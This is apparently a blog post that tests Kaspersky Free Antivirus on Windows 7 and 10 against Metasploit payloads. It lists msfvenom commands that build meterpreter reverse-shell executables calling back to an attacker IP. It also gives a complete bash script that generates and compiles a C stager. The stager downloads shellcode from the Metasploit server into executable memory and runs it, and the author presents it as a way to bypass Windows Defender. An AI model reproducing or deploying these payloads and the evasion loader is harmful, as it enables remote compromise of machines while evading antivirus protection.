Kaspersky Free Antivirus for Widnows vs. Metasploit

Kaspersky has finally released their free version (no trial) of Antivirus for Windows platform, and as they claim, in return, it will use data you contribute to improve machine learning across its products.

So lest check out how this product handles various Metasploit payloads and encoders. I have made two sets of tests, one n fully patched Windows 7 SP1 x64 (ver. 6.1.7601) and one on Windows 10 x64 (build 10586)

Test 1)  Windows 7 SP1 x64(ver 6.1.7601)

Lest prepare a set of executable payloads first

32bit tests
./msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHST=192.168.11.6 LPORT=443 -f exe > 01.reverse_tcp.exe
./msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHST=192.168.11.6 LPORT=443 -b '\x00' -f exe > 02.reverse_tcp.exe
./msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_https LHST=192.168.11.6 LPORT=443 -f exe > 01.reverse_https.exe
./msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_https LHST=192.168.11.6 LPORT=443 -b '\x00' -f exe > 02.reverse_https.exe

64bit tests
./msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp LHST=192.168.11.6 LPORT=443 -f exe > 01.reverse_tcp64.exe
./msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp LHST=192.168.11.6 LPORT=443 -b '\x00' -f exe > 02.reverse_tcp64.exe
./msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_https LHST=192.168.11.6 LPORT=443 -f exe > 01.reverse_https64.exe
./msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_https LHST=192.168.11.6 LPORT=443 -b '\x00' -f exe > 02.reverse_https64.exe

Java test
./msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.11.6 LPORT=443 > test.jar

And put these binaries up on a SMB share so we can use them later from the VMs

So once we have Kaspersky free installed and configured https://www.kaspersky.com/free-antivirus

We can start the actual tests. As you can see it performs fine and picks up most of the generated executable payloads via meterpreter

However it fails on this one

./msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_https LHST=192.168.11.6 LPORT=443 -b '\x00' -f exe > 02.reverse_https64.exe

As you can see from the video demo we can get a meterpreter shell quite easily via msfvenom generated executables (no hackery involved)

 

Test 2)  Windows 10 x64 (build 10586)

Now here Kaspersky Free has failed badly. It looks like the inbuilt MS Defender still protects the system (and does a better job to detection of the above generated msfvenom binaries) For some reason the Kaspersky AV engine only picks up the JAR meterpreter payload, while Windows Defender takes care of the rest of the executables. Maybe its because I use this old Windows 10 build (10586) Not sure, but it definitely does not work well on this platform.

You can see the output in this short video

I had to use a custom exe payload generator to bypass Windows Defender instead :)

#!/bin/bash
clear
echo "****************************************************************"
echo " Automatic C source code generator - FOR METASPLOIT "
echo " Based on rsmudge metasploit-loader "
echo "****************************************************************" 
echo -en 'Metasploit server IP : ' 
read ip
echo -en 'Metasploit port number : ' 
read port

echo '#include <stdio.h>'> temp.c 
echo '#include <stdlib.h>' >> temp.c 
echo '#include <winsock2.h>' >> temp.c
echo '#include <windows.h>' >> temp.c 
echo -n 'unsigned char server[]="' >> temp.c 
echo -n $ip >> temp.c 
echo -n '";' >> temp.c 
echo '' >> temp.c 
echo -n 'unsigned char serverp[]="' >> temp.c 
echo -n $port >> temp.c 
echo -n '";' >> temp.c 
echo '' >> temp.c 
echo 'void winsock_init() {' >> temp.c 
echo ' WSADATA wsaData;' >> temp.c 
echo ' WORD wVersionRequested;' >> temp.c 
echo ' wVersionRequested = MAKEWORD(2, 2);'>> temp.c 
echo ' if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> temp.c 
echo ' printf("bad\n"); '>> temp.c 
echo ' WSACleanup(); '>> temp.c 
echo ' exit(1);'>> temp.c 
echo ' }' >> temp.c 
echo ' }' >> temp.c 
echo ' void punt(SOCKET my_socket, char * error) {' >> temp.c 
echo ' printf("r %s\n", error);'>> temp.c 
echo ' closesocket(my_socket);'>> temp.c 
echo ' WSACleanup();'>> temp.c 
echo ' exit(1);' >> temp.c 
echo ' }' >> temp.c 
echo ' int recv_all(SOCKET my_socket, void * buffer, int len) {' >> temp.c 
echo ' int tret = 0;'>> temp.c 
echo ' int nret = 0;'>>temp.c 
echo ' void * startb = buffer;'>> temp.c 
echo ' while (tret < len) {'>>temp.c 
echo ' nret = recv(my_socket, (char *)startb, len - tret, 0);'>> temp.c 
echo ' startb += nret;'>> temp.c 
echo ' tret += nret;'>>temp.c 
echo ' if (nret == SOCKET_ERROR)'>> temp.c 
echo ' punt(my_socket, "no data");'>> temp.c 
echo ' }'>>temp.c 
echo ' return tret;'>> temp.c 
echo '}' >> temp.c 
echo 'SOCKET wsconnect(char * targetip, int port) {'>> temp.c 
echo ' struct hostent * target;' >> temp.c 
echo ' struct sockaddr_in sock;' >> temp.c
echo ' SOCKET my_socket;'>>temp.c 
echo ' my_socket = socket(AF_INET, SOCK_STREAM, 0);'>> temp.c 
echo ' if (my_socket == INVALID_SOCKET)'>> temp.c 
echo ' punt(my_socket, ".");'>>temp.c 
echo ' target = gethostbyname(targetip);'>>temp.c 
echo ' if (target == NULL)'>>temp.c 
echo ' punt(my_socket, "..");'>>temp.c 
echo ' memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);'>>temp.c 
echo ' sock.sin_family = AF_INET;'>> temp.c 
echo ' sock.sin_port = htons(port);'>>temp.c 
echo ' if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )'>>temp.c 
echo ' punt(my_socket, "...");'>>temp.c 
echo ' return my_socket;'>>temp.c 
echo '}' >> temp.c 
echo 'int main(int argc, char * argv[]) {' >> temp.c 
echo ' FreeConsole();'>>temp.c 
echo ' Sleep(10);'>>temp.c 
echo ' ULONG32 size;'>>temp.c 
echo ' char * buffer;'>>temp.c 
echo ' void (*function)();'>>temp.c 
echo ' winsock_init();'>> temp.c 
echo ' SOCKET my_socket = wsconnect(server, atoi(serverp));'>>temp.c 
echo ' int count = recv(my_socket, (char *)&size, 4, 0);'>>temp.c 
echo ' if (count != 4 || size <= 0)'>>temp.c 
echo ' punt(my_socket, "error lenght\n");'>>temp.c 
echo ' buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);'>>temp.c 
echo ' if (buffer == NULL)'>>temp.c 
echo ' punt(my_socket, "error in buf\n");'>>temp.c 
echo ' buffer[0] = 0xBF;'>>temp.c 
echo ' memcpy(buffer + 1, &my_socket, 4);'>>temp.c 
echo ' count = recv_all(my_socket, buffer + 5, size);'>>temp.c 
echo ' function = (void (*)())buffer;'>>temp.c 
echo ' function();'>>temp.c 
echo ' return 0;'>>temp.c 
echo '}' >> temp.c 
echo '(+) Compiling binary ..' 
i686-w64-mingw32-gcc temp.c -o payload.exe -lws2_32 -mwindows 
ls -la temp.c
strip payload.exe 
file=`ls -la payload.exe` ; echo '(+)' $file

 

 

Advertisements
Gallery | This entry was posted in Uncategorized. Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s